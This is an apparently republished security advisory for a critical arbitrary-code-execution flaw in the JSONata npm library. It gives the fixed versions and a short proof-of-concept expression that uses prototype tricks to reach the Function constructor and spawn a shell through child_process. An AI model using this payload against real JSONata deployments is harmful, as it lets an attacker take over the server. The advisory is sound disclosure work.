criticalVulnerability

CVE-2026-77413

## Impact Before JSONata `2.2.0` and `1.8.8` it was possible to execute arbitrary code with crafted expressions, due to a missing `hasOwnProperty` check in the `lookup` function: https://github.com/jsonata-js/jsonata/blob/f9632e01e6e67d4f9f00593f9795420cb4b57f48/src/functions.js#L1686-L1705 This was fixed with https://github.com/jsonata-js/jsonata/pull/794, which is included in the `2.2.0` release, and ported in the `1.8.8` release. ## PoC ```js import jsonata from "jsonata"; const expression = jsonata(` ( __lookupSetter__('__proto__')(constructor); __defineGetter__('l', constructor("return process.getBuiltinModule('child_process').execSync('sh',{stdio:'inherit'}).toString()")); valueOf().l ) `); await expression.evaluate({}); ```

Properties

ghsa_id
GHSA-8gq3-vp5j-2grp
severity
critical
summary
JSONata: Arbitrary Code Execution via crafted JSONata expressions
cve_id
CVE-2026-77413
is_ghsa_only
false
ghsa_published
2026-08-21T20:57:07Z
source_url
https://github.com/advisories/GHSA-8gq3-vp5j-2grp
ghsa_updated
2026-08-21T20:57:09Z

Related Entities (4)

VULNERABLE_TO (1)

[Software]npm/jsonata

AFFECTS (1)

[Software]npm/jsonata

HAS_WEAKNESS (1)

[Weakness]Improper Control of Generation of Code ('Code Injection')

REPORTED_BY (1)

[Source]GitHub Advisory Database

Explore deeper with Ninja Signal's threat intelligence graph

CVE-2026-77413 — Ninja Signal Threat Intelligence | Ninja Signal